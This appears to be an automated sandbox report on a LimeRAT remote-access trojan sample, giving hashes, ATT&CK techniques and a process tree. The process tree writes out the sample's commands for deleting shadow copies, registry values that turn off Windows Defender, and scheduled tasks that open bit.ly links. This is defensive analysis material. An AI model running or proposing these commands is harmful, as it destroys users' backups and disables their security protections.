limerat | 3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69

Analysis

max time kernel
107s
max time network
110s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
27-09-2022 18:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe
Size

334KB
MD5

23ceb5e125022c67b8c66cacd2d17803
SHA1

a0eec28de7c622645138d598e77c55eb640b7933
SHA256

3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69
SHA512

9124d423455f4bbd9a44225fd988aea8ed8b4ef941b274c9bdfa565992541464c065e51b895f51b0bd1de1c09f377ff2c1c532462ea91f29e2e58a13d77c8c71
SSDEEP

3072:QI/0W1y4RbPNubjn1GwAEoznq1vK7rbKOtoqoO0MdSgZNz:QRky4ebxknq1cmK0ZiN

Score

10^/10

limerat evasion ransomware rat trojan

Malware Config

Signatures

Contains code to disable Windows Defender 4 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral1/memory/1480-54-0x0000000000980000-0x00000000009D8000-memory.dmp	disable_win_def
behavioral1/files/0x0005000000005804-94.dat	disable_win_def
behavioral1/files/0x0005000000005804-95.dat	disable_win_def
behavioral1/memory/2556-96-0x0000000000CB0000-0x0000000000D08000-memory.dmp	disable_win_def

LimeRAT
Simple yet powerful RAT for Windows machines written in .NET.
rat limerat

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start = "4"	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Executes dropped EXE 1 IoCs

pid	Process
2556	TRACERT.exe

Drops desktop.ini file(s) 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\LinkM\desktop.ini	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\LinkM\desktop.ini	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe
File created	C:\Users\Admin\AppData\Roaming\LinkM\desktop.ini	TRACERT.exe

Enumerates connected drives 3 TTPs 17 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2124	2556	WerFault.exe	79

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2612	schtasks.exe
304	schtasks.exe
2508	schtasks.exe
2520	schtasks.exe

Disables Windows logging functionality 2 TTPs
Changes registry settings to disable Windows Event logging.

Disabling Security Tools
T1089

Modify Registry
T1112

Interacts with shadow copies 2 TTPs 12 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1808	vssadmin.exe
1116	vssadmin.exe
1612	vssadmin.exe
1036	vssadmin.exe
664	vssadmin.exe
1560	vssadmin.exe
304	vssadmin.exe
1444	vssadmin.exe
296	vssadmin.exe
1604	vssadmin.exe
1552	vssadmin.exe
1596	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe
1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe
1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe
1360	powershell.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe
2556	TRACERT.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe
Token: SeDebugPrivilege	1360	powershell.exe
Token: SeBackupPrivilege	2144	vssvc.exe
Token: SeRestorePrivilege	2144	vssvc.exe
Token: SeAuditPrivilege	2144	vssvc.exe
Token: SeBackupPrivilege	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe
Token: SeSecurityPrivilege	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe
Token: SeBackupPrivilege	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe
Token: SeDebugPrivilege	2556	TRACERT.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1480 wrote to memory of 304	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	27
PID 1480 wrote to memory of 304	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	27
PID 1480 wrote to memory of 304	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	27
PID 1480 wrote to memory of 1360	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	30
PID 1480 wrote to memory of 1360	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	30
PID 1480 wrote to memory of 1360	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	30
PID 1480 wrote to memory of 1528	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	32
PID 1480 wrote to memory of 1528	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	32
PID 1480 wrote to memory of 1528	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	32
PID 1480 wrote to memory of 1328	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	67
PID 1480 wrote to memory of 1328	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	67
PID 1480 wrote to memory of 1328	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	67
PID 1480 wrote to memory of 1800	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	35
PID 1480 wrote to memory of 1800	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	35
PID 1480 wrote to memory of 1800	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	35
PID 1480 wrote to memory of 808	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	65
PID 1480 wrote to memory of 808	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	65
PID 1480 wrote to memory of 808	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	65
PID 1480 wrote to memory of 952	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	36
PID 1480 wrote to memory of 952	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	36
PID 1480 wrote to memory of 952	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	36
PID 1328 wrote to memory of 1736	1328	cmd.exe	37
PID 1328 wrote to memory of 1736	1328	cmd.exe	37
PID 1328 wrote to memory of 1736	1328	cmd.exe	37
PID 1480 wrote to memory of 1896	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	40
PID 1480 wrote to memory of 1896	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	40
PID 1480 wrote to memory of 1896	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	40
PID 1480 wrote to memory of 912	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	61
PID 1480 wrote to memory of 912	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	61
PID 1480 wrote to memory of 912	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	61
PID 1528 wrote to memory of 1552	1528	cmd.exe	42
PID 1528 wrote to memory of 1552	1528	cmd.exe	42
PID 1528 wrote to memory of 1552	1528	cmd.exe	42
PID 1480 wrote to memory of 1620	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	43
PID 1480 wrote to memory of 1620	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	43
PID 1480 wrote to memory of 1620	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	43
PID 808 wrote to memory of 1596	808	cmd.exe	44
PID 808 wrote to memory of 1596	808	cmd.exe	44
PID 808 wrote to memory of 1596	808	cmd.exe	44
PID 1480 wrote to memory of 1092	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	45
PID 1480 wrote to memory of 1092	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	45
PID 1480 wrote to memory of 1092	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	45
PID 1800 wrote to memory of 1560	1800	cmd.exe	47
PID 1800 wrote to memory of 1560	1800	cmd.exe	47
PID 1800 wrote to memory of 1560	1800	cmd.exe	47
PID 1480 wrote to memory of 1468	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	50
PID 1480 wrote to memory of 1468	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	50
PID 1480 wrote to memory of 1468	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	50
PID 952 wrote to memory of 304	952	cmd.exe	48
PID 952 wrote to memory of 304	952	cmd.exe	48
PID 952 wrote to memory of 304	952	cmd.exe	48
PID 1480 wrote to memory of 2016	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	51
PID 1480 wrote to memory of 2016	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	51
PID 1480 wrote to memory of 2016	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	51
PID 912 wrote to memory of 1036	912	cmd.exe	52
PID 912 wrote to memory of 1036	912	cmd.exe	52
PID 912 wrote to memory of 1036	912	cmd.exe	52
PID 1480 wrote to memory of 1184	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	55
PID 1480 wrote to memory of 1184	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	55
PID 1480 wrote to memory of 1184	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	55
PID 1480 wrote to memory of 1140	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	53
PID 1480 wrote to memory of 1140	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	53
PID 1480 wrote to memory of 1140	1480	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	53
PID 1620 wrote to memory of 1444	1620	cmd.exe	63

C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe
"C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies security service
- Drops desktop.ini file(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1480
- C:\Windows\system32\schtasks.exe
  schtasks /create /f /sc MINUTE /mo 30 /RL LIMITED /tn UpdateDMR /tr "'C:\Users\Admin\AppData\Local\Temp\Help\TRACERT.exe'"
  2⤵
  - Creates scheduled task(s)
  PID:304
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1360
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin Delete Shadows /all /quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1528
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:1552
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1800
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:1560
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:952
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:304
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  PID:1896
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:664
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1620
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1444
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  PID:1092
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1808
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  PID:1468
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1604
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  PID:2016
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1612
- C:\Windows\system32\cmd.exe
  cmd /c Vssadmin delete shadowstorage /all /quiet
  2⤵
  PID:1140
- - C:\Windows\system32\vssadmin.exe
    Vssadmin delete shadowstorage /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:1116
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  PID:1184
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:296
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:912
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:808
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1328
- C:\Windows\system32\cmd.exe
  cmd /C schtasks /create /f /st "13:47" /sc weekly /mo "20" /d "Fri" /tn "WinSAT" /tr "'explorer'http://bit.ly/3c19hBZ"
  2⤵
  PID:2452
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /st "13:47" /sc weekly /mo "20" /d "Fri" /tn "WinSAT" /tr "'explorer'http://bit.ly/3c19hBZ"
    3⤵
    - Creates scheduled task(s)
    PID:2508
- C:\Windows\system32\cmd.exe
  cmd /C schtasks /create /f /st "15:23" /sc monthly /m "apr" /tn "Microsoft-Windows-DiskDiagnosticResolver" /tr "'explorer'http://bit.ly/2M4fx0H"
  2⤵
  PID:2464
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /st "15:23" /sc monthly /m "apr" /tn "Microsoft-Windows-DiskDiagnosticResolver" /tr "'explorer'http://bit.ly/2M4fx0H"
    3⤵
    - Creates scheduled task(s)
    PID:2520
- C:\Users\Admin\AppData\Local\Temp\Help\TRACERT.exe
  "C:\Users\Admin\AppData\Local\Temp\Help\TRACERT.exe"
  2⤵
  - Executes dropped EXE
  - Drops desktop.ini file(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2556
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 30 /RL LIMITED /tn UpdateDMR /tr "'C:\Users\Admin\AppData\Local\Temp\Help\TRACERT.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:2612
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 2556 -s 2772
    3⤵
    - Program crash
    PID:2124

C:\Windows\system32\vssadmin.exe
vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
1⤵
PID:1736

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1596

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1036

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2144

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

File Deletion

Modify Registry

Web Service

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Help\TRACERT.exe

Filesize
334KB

MD5
23ceb5e125022c67b8c66cacd2d17803

SHA1
a0eec28de7c622645138d598e77c55eb640b7933

SHA256
3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69

SHA512
9124d423455f4bbd9a44225fd988aea8ed8b4ef941b274c9bdfa565992541464c065e51b895f51b0bd1de1c09f377ff2c1c532462ea91f29e2e58a13d77c8c71

Download Submit
C:\Users\Admin\AppData\Local\Temp\Help\TRACERT.exe

Filesize
334KB

MD5
23ceb5e125022c67b8c66cacd2d17803

SHA1
a0eec28de7c622645138d598e77c55eb640b7933

SHA256
3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69

SHA512
9124d423455f4bbd9a44225fd988aea8ed8b4ef941b274c9bdfa565992541464c065e51b895f51b0bd1de1c09f377ff2c1c532462ea91f29e2e58a13d77c8c71

Download Submit
memory/1360-60-0x0000000002884000-0x0000000002887000-memory.dmp

Filesize
12KB

Download
memory/1360-57-0x000007FEFB991000-0x000007FEFB993000-memory.dmp

Filesize
8KB

Download
memory/1360-58-0x000007FEEC5D0000-0x000007FEECFF3000-memory.dmp

Filesize
10.1MB

Download
memory/1360-62-0x000000000288B000-0x00000000028AA000-memory.dmp

Filesize
124KB

Download
memory/1360-61-0x0000000002884000-0x0000000002887000-memory.dmp

Filesize
12KB

Download
memory/1360-59-0x000007FEEBA70000-0x000007FEEC5CD000-memory.dmp

Filesize
11.4MB

Download
memory/1480-54-0x0000000000980000-0x00000000009D8000-memory.dmp

Filesize
352KB

Download
memory/2556-96-0x0000000000CB0000-0x0000000000D08000-memory.dmp

Filesize
352KB

Download
memory/2556-99-0x000000001B416000-0x000000001B435000-memory.dmp

Filesize
124KB

Download